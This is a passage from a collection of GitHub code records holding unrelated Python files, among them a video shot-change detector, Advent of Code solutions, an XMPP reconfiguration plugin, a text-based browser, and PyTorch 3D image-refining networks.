vidLen):\n self.fps = fps\n self.vidLen = vidLen\n pass\n\n @staticmethod\n def getHistFeatures(frame):\n histFeats = []\n feat = ShotChangeHist.calcHistFeatOfImage(frame, bool_inputrgb=False)\n return feat\n\n @staticmethod\n def calcHistFeatOfImage(img, bool_inputrgb=False):\n tmp = cv2.resize(img, (120, 90))\n if bool_inputrgb:\n rgb_image = tmp\n else:\n rgb_image = cv2.cvtColor(tmp, cv2.COLOR_BGR2RGB)\n\n return HistCalculate.calculateHist(rgb_image)\n\n def getDistanceArr(self, histFeats, timestamps):\n distArr = []\n stepCount = 10\n \n\n for index in range(len(histFeats)):\n tempObj = {}\n tempObj[index] = []\n \n for j in range(1, stepCount):\n if index-j >= 0:\n tempObj[index].append(HistCalculate.calculateHistDistance(histFeats[index], histFeats[index-j]))\n else:\n break\n\n distArr.append(tempObj)\n\n print(distArr)\n\n return distArr\n\n def _getShotChange(self, arr):\n shotChange = []\n arrLen = len(arr)\n assignedArr = [0]*arrLen\n\n # Threshold value of min 0.25 to detect change\n for i in range(arrLen):\n if len(arr[i]) > 0:\n for (key, value) in (arr[i]).items():\n # print(value)\n value = np.array(value)\n if len(value[value < 0.035]):\n assignedArr[i] = 1\n\n for index in range(arrLen):\n shotChange.append(index) if assignedArr[index] == 0 else None\n\n shotChange = sorted(shotChange)\n\n return shotChange\n\n\n def obtainShotChanges(self, histFeats, timestamps):\n distArr = self.getDistanceArr(histFeats, timestamps)\n # print(len(distArr), distArr)\n totalChanges = self._getShotChange(distArr)\n print(totalChanges)\n\n shotChangepts = []\n\n for item in totalChanges:\n shotChangepts.append(timestamps[item])\n\n return totalChanges, shotChangepts\n\nclass HistCalculate:\n @staticmethod\n def calculateHist(rgb_image):\n\n # extract a 3D RGB color histogram from the image,\n # using 8 bins per channel, normalize, and update\n # the index\n hist = cv2.calcHist([rgb_image], [0, 1, 2], None, [8, 8, 8], [0, 256, 0, 256, 0, 256])\n hist = cv2.normalize(hist, hist).flatten() # Size=8x8x8 = 512 distinct values\n return hist\n\n\n @staticmethod\n def calculateHistDistance(prevHist, nextHist):\n distance = cv2.compareHist(prevHist, nextHist, HISTCMPOPTION)\n return distance\n\n\nif __name__ == '__main__':\n # print(\"hello\n shotChange = ShotChangeHist(30, None)\n\n capture = cv2.VideoCapture(\"people.mp4\")\n print(shotChange)\n\n histFeats = []\n timeStamps = []\n\n # OUTPUT_FILE = \"people.mp4\"\n frame_cnt = 0\n timestamp = datetime.now()\n\n while(True):\n # print(\"here\")\n ret, frame = capture.read()\n\n if ret:\n timestamp = timestamp + timedelta(seconds = 1)\n feat = shotChange.getHistFeatures(frame)\n # out.write(frame)\n # if utils.getChanges(frame, prev):\n # active = active + 1\n # change_frames.append(frame_cnt)\n if frame_cnt > 40 and frame_cnt < 100:\n cv2.imwrite(\"output/frame_\" + str(frame_cnt) + '.jpg', frame)\n\n if frame_cnt > 100:\n break\n if frame_cnt % 30 == 0 and frame_cnt != 0:\n if frame_cnt/30 == 2:\n changes, ts = shotChange.obtainShotChanges(histFeats, timeStamps)\n changes = [x + frame_cnt - 10 for x in changes]\n print(\"############\",changes, frame_cnt/30)\n\n histFeats = histFeats[-11:-1] + [feat]\n timeStamps = timeStamps[-11:-1] + [timestamp]\n else:\n histFeats.append(feat)\n timeStamps.append(timestamp)\n\n else:\n break\n\n frame_cnt = frame_cnt + 
1","repo_name":"varshasachan/China-Machine-Camera-","sub_path":"videorecorder/cv_utils.py","file_name":"cv_utils.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18463046613","text":"\"\"\"8.\tFaça um programa que pergunte o preço de três produtos e informe qual produto você deve comprar, sabendo que a\ndecisão é sempre pelo mais barato.\n\"\"\"\nfrom Ext_Decisao.Menor import menor_valor\npreco = []\ni = 0\nwhile i < 3:\n i += 1\n preco.append(float(input(\"Digite o preço do primeiro produto: \")))\n\nposicao = menor_valor(preco)\n\nprint(\"Você deve comprar o \", posicao + 1, \"produto que custa R$\", preco[posicao])\n","repo_name":"chrismol2004/MOL","sub_path":"Ext_Decisao/Parte1/L8.py","file_name":"L8.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31710804343","text":"# 4 00:59:51 15808 0 01:11:22 15681 0\n\nfrom aocd.models import Puzzle\nfrom aocd import submit\nimport time\n\nYEAR = int('2022')\nDAY = int('04')\n\ndef parse_input():\n puzzle = Puzzle(day=DAY, year=YEAR)\n indata = puzzle.input_data.split('\\n')\n return indata\n\n\ndef part1(indata):\n score = 0\n for row in indata:\n a, b = row.split(',')\n a0, a1 = [int(x) for x in a.split('-')]\n b0, b1 = [int(x) for x in b.split('-')]\n if (a0 <= b0 and b1 <= a1) or (b0 <= a0 and a1 <= b1):\n score += 1\n\n return score\n\n\ndef part2(indata):\n score = 0\n for row in indata:\n a, b = row.split(',')\n a0, a1 = [int(x) for x in a.split('-')]\n b0, b1 = [int(x) for x in b.split('-')]\n if not (a1 < b0 or b1 < a0):\n score += 1\n\n return score\n\n\nif __name__ == \"__main__\":\n indata = parse_input()\n t0 = time.time()\n\n part1_answer = part1(indata)\n print(\"\\npart1:\", part1_answer)\n submit(part1_answer, part=\"a\", day=DAY, year=YEAR)\n\n part2_answer = part2(indata)\n print(\"\\npart2:\", part2_answer)\n submit(part2_answer, part=\"b\", day=DAY, year=YEAR)\n\n print(\"\\ntime:\", time.time()-t0)\n","repo_name":"badboj40/advent-of-code","sub_path":"2022/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"44353737088","text":"# -*- coding: utf-8 -*-\n#\n# (c) 2016 siveo, http://www.siveo.net\n#\n# This file is part of Pulse 2, http://www.siveo.net\n#\n# Pulse 2 is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# Pulse 2 is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Pulse 2; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# file pluginsmaster/plugin_loadreconf.py\n\nimport json\nimport os\nimport logging\nfrom mmc.plugins.xmppmaster.master.lib.utils import getRandomName\nimport types\nimport ConfigParser\nfrom pulse2.database.xmppmaster import XmppMasterDatabase\nfrom sleekxmpp import jid\nimport time\n\nlogger = logging.getLogger()\nDEBUGPULSEPLUGIN = 25\n\n# this plugin calling to starting agent\n\nplugin = {\"VERSION\" : \"1.0\", \"NAME\" : \"loadreconf\", \"TYPE\" : \"master\"}\n\ndef action( objectxmpp, action, sessionid, data, msg, dataerreur):\n logger.debug(\"=====================================================\")\n logger.debug(\"call %s from %s\"%(plugin, msg['from']))\n logger.debug(\"=====================================================\")\n\n compteurcallplugin = getattr(objectxmpp, \"num_call%s\"%action)\n\n if compteurcallplugin == 0:\n read_conf_loadreconf(objectxmpp)\n logger.debug(\"Configuration remote update\")\n objectxmpp.concurentdata = {}\n objectxmpp.loadreconf = types.MethodType(loadreconf,\n objectxmpp)\n objectxmpp.listconcurentreconf = []\n objectxmpp.schedule('loadreconf',\n objectxmpp.generate_reconf_interval,\n objectxmpp.loadreconf,\n args=(objectxmpp,),\n repeat=True)\n\n\ndef loadreconf(self, objectxmpp):\n \"\"\"\n Runs the load fingerprint\n \"\"\"\n # calcul time entre 2 demandes de reconfiguration.\n t = time.time()\n end = t + objectxmpp.generate_reconf_interval\n\n datasend = {\"action\": \"force_setup_agent\",\n \"data\": \"\",\n 'ret': 0,\n 'sessionid': getRandomName(5, \"loadreconf_\")}\n result = []\n while(time.time() < end):\n listmachine_timeoutreconf = [x[0] for x in objectxmpp.listconcurentreconf if x[2] <= t]\n if len(listmachine_timeoutreconf) != 0:\n #acquite sur timeout\n logger.warning (\"The following machines are currently offline and their reconfiguration will be processed later: %s\"%listmachine_timeoutreconf)\n XmppMasterDatabase().call_set_list_machine(listmachine=listmachine_timeoutreconf)\n # on supprime les non acquites suivant timeout de plus de generate_reconf_interval seconde\n objectxmpp.listconcurentreconf = [x for x in objectxmpp.listconcurentreconf if x[2] > t]\n viability = time.time() + objectxmpp.timeout_reconf\n\n list_need_reconf = [ x[0] for x in objectxmpp.listconcurentreconf]\n # lists reconf terminate\n if len(list_need_reconf) > 0:\n resultacquite = XmppMasterDatabase().call_acknowledged_reconficuration(list_need_reconf)\n # liste des concurent\n if len(resultacquite) > 0:\n logger.debug (\"concurent acquite machines id %s\"%resultacquite)\n objectxmpp.listconcurentreconf = [ x for x in objectxmpp.listconcurentreconf \\\n if x[0] not in resultacquite]\n if len(result) == 0:\n result = XmppMasterDatabase().call_reconfiguration_machine(limit = objectxmpp.nbconcurrentreconf)\n if len(result) == 0:\n return\n list_updatenopresence = []\n while len(objectxmpp.listconcurentreconf) < objectxmpp.nbconcurrentreconf and \\\n len(result) > 0 and \\\n time.time() < end:\n eltmachine = result.pop(0)\n eltmachine.append(viability)\n objectxmpp.listconcurentreconf.append(eltmachine)\n self.send_message( mto = eltmachine[1],\n mbody=json.dumps(datasend),\n mtype='chat')\n logger.debug (\"SEND RECONFIGURATION %s (%s)\"%(eltmachine[1], eltmachine[0]))\n 
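            # remember this machine id so its presence flag can be updated in one
            # batched call_set_list_machine() call once the send loop finishes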
list_updatenopresence.append(eltmachine[0])\n if len(list_updatenopresence) != 0:\n #logger.debug (\"update off presence machine reconf%s\"%list_updatenopresence)\n XmppMasterDatabase().call_set_list_machine(listmachine=list_updatenopresence)\n time.sleep(.2)\n\ndef read_conf_loadreconf(objectxmpp):\n namefichierconf = plugin['NAME'] + \".ini\"\n pathfileconf = os.path.join( objectxmpp.config.pathdirconffile, namefichierconf )\n if not os.path.isfile(pathfileconf):\n logger.warning(\"plugin %s\\nConfiguration file :\" \\\n \"\\n\\t%s missing\" \\\n \"\\neg conf:\\n[parameters]\\n\" \\\n \"generate_reconf_interval = 60\\n\" \\\n \"concurrentreconf = 240\\n\" \\\n \"timeout_reconf = 500\"%( plugin['NAME'],\n pathfileconf))\n objectxmpp.generate_reconf_interval = 60\n objectxmpp.nbconcurrentreconf = 240\n objectxmpp.timeout_reconf = 500\n else:\n Config = ConfigParser.ConfigParser()\n Config.read(pathfileconf)\n logger.debug(\"read file %s\"%pathfileconf)\n if os.path.exists(pathfileconf + \".local\"):\n Config.read(pathfileconf + \".local\")\n logger.debug(\"read file %s.local\"%pathfileconf)\n if Config.has_option(\"parameters\",\n \"generate_reconf_interval\"):\n objectxmpp.generate_reconf_interval = Config.getint('parameters',\n 'generate_reconf_interval')\n else:\n objectxmpp.generate_reconf_interval = 60\n\n if Config.has_option(\"parameters\",\n \"concurrentreconf\"):\n objectxmpp.nbconcurrentreconf = Config.getint('parameters',\n 'concurrentreconf')\n else:\n objectxmpp.nbconcurrentreconf = 240\n\n\n if Config.has_option(\"parameters\",\n \"timeout_reconf\"):\n objectxmpp.timeout_reconf = Config.getint('parameters',\n 'timeout_reconf')\n else:\n objectxmpp.timeout_reconf = 500\n objectxmpp.plugin_loadreconf = types.MethodType(plugin_loadreconf, objectxmpp)\n\ndef plugin_loadreconf(self, msg, data):\n # Manage update remote agent\n pass\n","repo_name":"medulla-tech/medulla","sub_path":"services/mmc/plugins/xmppmaster/master/pluginsmaster/plugin_loadreconf.py","file_name":"plugin_loadreconf.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"} +{"seq_id":"40171392421","text":"# coding: utf-8\n\nfrom collections import Counter\n\nnumbers = []\n\nfor _ in range(10):\n number = int(input())\n numbers.append(number)\n c = Counter(numbers)\n \nprint(sum(numbers)//10)\nprint(c.most_common(1)[0][0])\n\n","repo_name":"lee-seul/baekjoon","sub_path":"2592.py","file_name":"2592.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"35461554809","text":"# Implement a function my_sqrt that receives a non-negative integer x,\n# and returns the square root of x rounded down to the nearest integer.\n#\n# The returned integer should be non-negative as well.\n# You must not use any built-in exponent function or operator like x ** 0.5 or math.sqrt() in python.\n\ndef my_sqrt(x: int):\n for i in range(1, x + 1):\n if x // i == i:\n return i\n elif x // i == i - 1:\n return i - 1\n\n\nif __name__ == \"__main__\":\n for i in range(1, 100 + 1):\n print(f\"sqrt of {i} is: {my_sqrt(i)}\")","repo_name":"druckhead/EduLabs-FullStack-Course","sub_path":"python/Lessons/Lesson_6/Exam_1/E3.py","file_name":"E3.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11658210272","text":"import os\nimport sys\nimport requests\nfrom bs4 
import BeautifulSoup\nimport colorama\nfrom colorama import init, Fore\n\n\nnytimes_com = '''\nThis New Liquid Is Magnetic, and Mesmerizing\n\nScientists have created “soft” magnets that can flow\nand change shape, and that could be a boon to medicine\nand robotics. (Source: New York Times)\n\n\nMost Wikipedia Profiles Are of Men. This Scientist Is Changing That.\n\nJessica Wade has added nearly 700 Wikipedia biographies for\n important female and minority scientists in less than two\n years.\n\n'''\n\nbloomberg_com = '''\nThe Space Race: From Apollo 11 to Elon Musk\n\nIt's 50 years since the world was gripped by historic images\n of Apollo 11, and Neil Armstrong -- the first man to walk\n on the moon. It was the height of the Cold War, and the charts\n were filled with David Bowie's Space Oddity, and Creedence's\n Bad Moon Rising. The world is a very different place than\n it was 5 decades ago. But how has the space race changed since\n the summer of '69? (Source: Bloomberg)\n\n\nTwitter CEO Jack Dorsey Gives Talk at Apple Headquarters\n\nTwitter and Square Chief Executive Officer Jack Dorsey\n addressed Apple Inc. employees at the iPhone maker’s headquarters\n Tuesday, a signal of the strong ties between the Silicon Valley giants.\n'''\n\n\n# write your code here\ndef get_request(url: str):\n if not url.__contains__(\"https://\"):\n url = 'https://' + url\n return requests.get(url)\n\ndef readable_text(text):\n text_list = []\n tags = ['title', 'p', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'a', 'ul', 'ol', 'li']\n s = BeautifulSoup(text, 'html.parser')\n for tag in s.find_all(tags):\n text = tag.get_text()\n if tag.name == 'a':\n text = Fore.BLUE + text\n text_list.append(text)\n return '\\n'.join(text_list)\n\n\nif __name__ == '__main__':\n args = sys.argv\n directory = args[1]\n stack = []\n\n if not os.access(directory, os.F_OK):\n os.mkdir(directory)\n if os.access(directory, os.F_OK):\n while True:\n line = input().strip()\n colorama.init(autoreset=True)\n if line == 'exit':\n break\n elif line == 'back':\n if len(stack) != 0:\n file_name = stack.pop()\n file_name = stack.pop()\n file_path = os.path.join(directory, file_name)\n with open(file_path, 'r') as f:\n print(f.read())\n continue\n if line.count('.') > 0:\n # key = line.replace('.', '_')\n try:\n req = get_request(line)\n except requests.exceptions.ConnectionError:\n print('Incorrect URL')\n else:\n x = readable_text(req.content)\n print(x)\n file_name = line\n file_path = os.path.join(directory, file_name)\n with open(file_path, 'w') as f:\n f.write(x)\n\n\n # if key in ['nytimes_com', 'bloomberg_com']:\n # if key == 'nytimes_com':\n # print(nytimes_com)\n # values = nytimes_com\n # else:\n # print(bloomberg_com)\n # values = bloomberg_com\n # file_name = key.split('_')[0]\n # stack.append(file_name)\n # file_path = os.path.join(directory, file_name)\n # with open(file_path, 'w') as f:\n # f.write(values)\n # else:\n # print('Error: Incorrect URL')\n else:\n key = line.split()\n if len(key) == 1:\n if key[0] in os.listdir(directory):\n file_name = key[0]\n stack.append(file_name)\n file_path = os.path.join(directory, file_name)\n with open(file_path, 'r') as f:\n print(f.read())\n else:\n print('Error: Incorrect URL')\n else:\n print('Error: Incorrect URL')\n else:\n print('Error: Incorrect 
URL')\n","repo_name":"kushagrapunia/Text_Based_Browser","sub_path":"Text_Based_Browser.py","file_name":"Text_Based_Browser.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6565983609","text":"import numpy as np\r\nimport cv2\r\n\r\ndef main(img, user_input):\r\n #shows original image\r\n cv2.imshow(\"original\", img)\r\n \r\n #shows information image\r\n info = cv2.imread(\"blur_info.png\")\r\n cv2.imshow(\"info\", info)\r\n \r\n #makes a copy of original image\r\n blur = img.copy()\r\n #splits the image into three 2D arrays--blue, green, red values\r\n channels = cv2.split(img)\r\n #stores the image height and width\r\n height, width = img.shape[0], img.shape[1]\r\n #sets the kernel size\r\n k = user_input*2 + 1\r\n\r\n #sets a limit so the kernel doesn't go beyond the pixels and cause an error\r\n limit = int((k-1)/2)\r\n \r\n #loops through each channel\r\n for k in range(3):\r\n channel = channels[k]\r\n #loops through each colour value for a pixel\r\n for i in range(limit, height-limit):\r\n for j in range(limit, width-limit):\r\n #creates a slice of the image to calculate the average\r\n sample = np.zeros((k,k))\r\n sample = channel[i-limit:i+limit+1,j-limit:j+limit+1] \r\n \r\n #calculates mean and sets new pixel value in the new image\r\n mean = np.mean(sample)\r\n blur[i][j][k] = mean\r\n \r\n \r\n #shows new image\r\n cv2.imshow(\"blur\", blur)\r\n #ensures all windows close when a key is pressed\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n \r\n","repo_name":"timetraveller458/EPQ","sub_path":"blur_function.py","file_name":"blur_function.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7137000840","text":"import matplotlib.pyplot as plt\n\nx = [1, 2, 3, 4, 5, 6, 7, 8]\ny = [5, 7, 4, 5, 8, 2, 1, 3]\nplt.scatter(x, y, label='scattery', color='red', marker='*', s=100) # s here is th marker size\nplt.xlabel('x')\nplt.ylabel('y')\n\nplt.title('interesting Graph')\nplt.legend()\nplt.show()\n\n","repo_name":"messi10hitu/MATPLOT","sub_path":"scatter_plots.py","file_name":"scatter_plots.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13767821080","text":"import time\nimport threading\nimport socket\nimport queue\nimport os\nimport uuid\nimport tkinter as tk\nfrom common.config import Config\nfrom configparser import ConfigParser\n\ndef get_current_ms():\n return round(time.time() * 1000)\n\ndef get_current_ip_address():\n s_ip = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # socket for finding local network IP\n s_ip.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # reuse address if already in use\n ip = ''\n try:\n s_ip.connect(('10.255.255.255', 1))\n ip = s_ip.getsockname()[0]\n except Exception as e:\n print('Exception caught while trying to determine server IP')\n print(e)\n finally:\n s_ip.close()\n return ip\n\n# Read the file containing user settings\n# Create with default values, if no file exists yet\ndef read_user_config():\n if not os.path.isfile(\"config.ini\"):\n with open(\"config.ini\", \"w\") as f:\n pass\n\n config = ConfigParser()\n config.read(\"config.ini\")\n if not config.has_section(\"main\"):\n config.add_section(\"main\")\n\n # ID\n if config.has_option(\"main\", \"uuid\"):\n _id = config.get(\"main\", \"uuid\")\n else:\n _id = 
str(uuid.uuid4())\n config.set(\"main\", \"uuid\", _id)\n Config.ID = _id\n \n # Unknown devices\n if config.has_option(\"main\", \"unknown_client_handling\"):\n Config.UNKNOWN_CLIENT_HANDLING = config.getint(\"main\", \"unknown_client_handling\")\n else:\n config.set(\"main\", \"unknown_client_handling\", \"0\")\n \n # Full screenshots\n if config.has_option(\"main\", \"FULL_SCREENSHOTS_ENABLED\"):\n Config.FULL_SCREENSHOTS_ENABLED = config.getboolean(\"main\", \"FULL_SCREENSHOTS_ENABLED\")\n else:\n config.set(\"main\", \"FULL_SCREENSHOTS_ENABLED\", \"0\")\n\n # Save\n with open(\"config.ini\", \"w\") as f:\n config.write(f)\n\ndef set_user_config_option(option, value):\n config = ConfigParser()\n config.read(\"config.ini\")\n config.set(\"main\", option, value)\n with open(\"config.ini\", \"w\") as f:\n config.write(f)\n\ndef update_user_config():\n config = ConfigParser()\n config.read(\"config.ini\")\n config.set(\"main\", \"unknown_client_handling\", str(Config.UNKNOWN_CLIENT_HANDLING))\n config.set(\"main\", \"FULL_SCREENSHOTS_ENABLED\", str(Config.FULL_SCREENSHOTS_ENABLED))\n with open(\"config.ini\", \"w\") as f:\n config.write(f)\n\n# https://stackoverflow.com/a/48741004\nclass RepeatTimer(threading.Timer):\n def run(self):\n while not self.finished.wait(self.interval):\n self.function(*self.args, **self.kwargs)\n","repo_name":"PDA-UR/Screenshotmatcher-2.0","sub_path":"python-server/src/common/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"29899342280","text":"import torch\nimport torch.nn as nn\nimport torch.autograd as autograd\nfrom torch.autograd import Variable\nimport numpy as np\nfrom scipy.ndimage import gaussian_filter\n\ndef init_weights(m):\n \"\"\"\n Glorot uniform initialization for network.\n \"\"\"\n if 'conv' in m.__class__.__name__.lower():\n torch.nn.init.xavier_uniform_(m.weight)\n if m.bias is not None:\n m.bias.data.fill_(0.01)\n\ndef compute_out_size(in_size, mod):\n \"\"\"\n Compute output size of Module `mod` given an input with size `in_size`.\n \"\"\"\n \n f = mod.forward(autograd.Variable(torch.Tensor(1, *in_size)))\n return f.size()[1:]\n\nclass ResnetBlock(nn.Module):\n def __init__(self, input_features, nb_features=64, filter_len=3, stride=1, padding=0):\n super(ResnetBlock, self).__init__()\n self.conv1 = nn.Conv3d(input_features, nb_features, \n kernel_size=filter_len, stride=stride, \n padding=padding)\n self.conv2 = nn.Conv3d(nb_features, nb_features, \n kernel_size=filter_len, stride=stride, \n padding=padding)\n self.leakyrelu = nn.LeakyReLU()\n\n def forward(self, x):\n residual = x \n out = self.leakyrelu(self.conv1(x))\n out = self.conv2(out)\n out += residual\n out = self.leakyrelu(out)\n return out\n\n\nclass Refiner(nn.Module):\n def __init__(self, num_blocks=4, in_features=1, nb_features=64, filter_len=3, \n init=True, edge_kernel=None, use_cuda=True):\n super(Refiner, self).__init__()\n \n self.edge_kernel = edge_kernel\n\n # Input conv layer\n self.conv_1 = nn.Sequential(\n nn.Conv3d(in_channels=in_features, out_channels=nb_features, \n kernel_size=filter_len, stride=1, padding=1),\n nn.LeakyReLU()\n )\n\n # ResNet blocks\n blocks = []\n for i in range(num_blocks):\n blocks.append(ResnetBlock(nb_features, nb_features, \n filter_len=filter_len, padding=1))\n self.resnet_blocks = nn.Sequential(*blocks)\n\n # Output conv layer\n self.conv_2 = nn.Sequential(\n nn.Conv3d(in_channels=nb_features, \n 
out_channels=in_features, \n kernel_size=1, stride=1, padding=0),\n nn.Tanh()\n )\n \n # Initialize weights and biases\n if init:\n self.conv_1.apply(init_weights)\n self.resnet_blocks.apply(init_weights)\n self.conv_2.apply(init_weights)\n\n # Switch to GPU\n if use_cuda:\n self.conv_1 = self.conv_1.cuda()\n self.resnet_blocks = self.resnet_blocks.cuda()\n self.conv_2 = self.conv_2.cuda()\n\n def train_mode(self, flag=True):\n for p in self.parameters():\n p.requires_grad = flag\n\n def forward(self, x):\n out = self.conv_1(x)\n out = self.resnet_blocks(out)\n out = self.conv_2(out)\n if self.edge_kernel is not None:\n out = self.edge_kernel.apply_mask(x, out)\n return out\n\nclass EdgeKernel(nn.Module):\n def __init__(self, shapes, fade_perc=0.2, use_cuda=True):\n super(EdgeKernel, self).__init__()\n\n self.shapes = torch.tensor(shapes).type(torch.IntTensor)\n if use_cuda:\n self.shapes = self.shapes.cuda()\n \n self.masks = []\n for cnn_input_size in shapes:\n\n z_size = int(np.rint(fade_perc*cnn_input_size[0]))\n y_size = int(np.rint(fade_perc*cnn_input_size[1]))\n x_size = int(np.rint(fade_perc*cnn_input_size[2]))\n\n # Create the fade along each axis\n fade_z = np.linspace(0, 1, z_size)[...,np.newaxis,np.newaxis]\n fade_y = np.linspace(0, 1, y_size)[np.newaxis,...,np.newaxis]\n fade_x = np.linspace(0, 1, x_size)[np.newaxis,np.newaxis,...]\n \n # Turn this into a mask that can be applied to the scan during pre-processing.\n mask = np.ones((1,*cnn_input_size))\n mask[0,:z_size] *= fade_z\n mask[0,-z_size:] *= np.flip(fade_z)\n mask[0,:,:y_size] *= fade_y\n mask[0,:,-y_size:] *= np.flip(fade_y)\n mask[0,:,:,:x_size] *= fade_x\n mask[0,:,:,-x_size:] *= np.flip(fade_x)\n \n # Convolve with Gaussian\n mask = gaussian_filter(mask, sigma=0.6)\n \n mask = torch.Tensor(mask)\n if use_cuda:\n mask = mask.cuda()\n self.masks.append(mask)\n \n def apply_mask(self, orig_sample, edit_sample):\n # Locate correct mask\n shape = orig_sample.shape[-3:]\n shape = torch.tensor(shape, dtype=torch.int).view(1,3)\n indx = torch.nonzero(torch.sum(self.shapes==shape, dim=1)==3)\n mask = self.masks[indx]\n # Apply mask\n comb_sample = mask*edit_sample + (1-mask)*orig_sample\n return comb_sample\n \nclass Discriminator(nn.Module):\n def __init__(self, in_features=1, nb_features=[96,64,32,32,2], stride_len=[2,2,1,1,1], \n filter_len=3, init=True, use_cuda=True):\n super(Discriminator, self).__init__()\n\n paddings = []\n filter_lens = []\n for stride in stride_len:\n if stride>1:\n filter_lens.append(filter_len)\n paddings.append(1)\n else:\n filter_lens.append(1)\n paddings.append(0)\n \n # Convolutional layers\n self.convs = nn.Sequential(\n nn.Conv3d(in_channels=in_features, out_channels=nb_features[0], \n kernel_size=filter_lens[0], stride=stride_len[0], padding=paddings[0]),\n nn.LeakyReLU(),\n\n nn.Conv3d(in_channels=nb_features[0], out_channels=nb_features[1], \n kernel_size=filter_lens[1], stride=stride_len[1], padding=paddings[1]),\n nn.LeakyReLU(),\n\n nn.MaxPool3d(filter_len, 1, 1),\n\n nn.Conv3d(in_channels=nb_features[1], out_channels=nb_features[2], \n kernel_size=filter_lens[2], stride=stride_len[2], padding=paddings[2]),\n nn.LeakyReLU(),\n\n nn.Conv3d(in_channels=nb_features[2], out_channels=nb_features[3], \n kernel_size=filter_lens[3], stride=stride_len[3], padding=paddings[3]),\n nn.LeakyReLU(),\n\n nn.Conv3d(in_channels=nb_features[3], out_channels=nb_features[4], \n kernel_size=filter_lens[4], stride=stride_len[4], padding=paddings[4]),\n \n )\n \n # Initialize weights and biases\n if 
init:\n self.convs.apply(init_weights)\n\n # Switch to GPU\n if use_cuda:\n self.convs = self.convs.cuda()\n\n def train_mode(self, flag=True):\n for p in self.parameters():\n p.requires_grad = flag\n\n def forward(self, x):\n out = self.convs(x)\n out = out.permute(0, 2, 3, 4, 1).contiguous().view(-1, 2)\n out = nn.Softmax(dim=1)(out)\n return out","repo_name":"teaghan/CT_Editor","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"25237647689","text":"from django.http import JsonResponse\nfrom game.models.player.player import Player\ndef update_score(request):\n data = request.GET\n score = data.get('score')\n username = data.get('username')\n score = int(score)\n player = Player.objects.get(user__username=username)\n player.score +=score\n player.save()\n return JsonResponse({\n 'result': \"success\",\n })\n","repo_name":"Avengers-s/myapp","sub_path":"game/views/playground/update_score.py","file_name":"update_score.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"22216984821","text":"from zip_processor import ZipProcessor\nimport sys\nfrom PIL import Image\n\nclass ScaleZip(ZipProcessor):\n\n def process_files(self):\n '''Scale each image in the directory to 640x480'''\n for filename in self.temp_directory.iterdir():\n im = Image.open(str(filename))\n scaled = im.resize((640, 480))\n scaled.save(str(filename))\n\nif __name__ == \"__main__\":\n ScaleZip(*sys.argv[1:4]).process_zip()\n","repo_name":"PacktPublishing/Python_Master-the-Art-of-Design-Patterns","sub_path":"Module 1/Chapter5/5_20_scaleimage_inheritance.py","file_name":"5_20_scaleimage_inheritance.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"18"} +{"seq_id":"32043229328","text":"from urllib import request\nfrom project import Project\nimport toml\n\nclass ProjectReader:\n def __init__(self, url):\n self._url = url\n\n def get_project(self):\n # tiedoston merkkijonomuotoinen sisältö\n content = request.urlopen(self._url).read().decode(\"utf-8\")\n # print(content)\n parsed_content = toml.loads(content).get('tool').get('poetry')\n # print(parsed_content)\n \n project_name = parsed_content.get('name')\n project_description = parsed_content.get('description')\n project_license = parsed_content.get('license')\n\n project_dependencies = []\n for key in parsed_content.get('dependencies'):\n project_dependencies.append(key)\n \n project_dev_dependencies = []\n for key in parsed_content.get('group').get('dev').get('dependencies'):\n project_dev_dependencies.append(key)\n\n # deserialisoi TOML-formaatissa oleva merkkijono ja muodosta Project-olio sen tietojen perusteella\n return Project(project_name , project_description, project_license, project_dependencies, project_dev_dependencies)\n","repo_name":"Gwasagir/ohjelmistotuotanto","sub_path":"viikko2/project-reader/src/project_reader.py","file_name":"project_reader.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4429139069","text":"import pdb\n\n\ndef calculate():\n\n lines = []\n with open(\"data.txt\") as f:\n lines = f.readlines()\n\n mem: 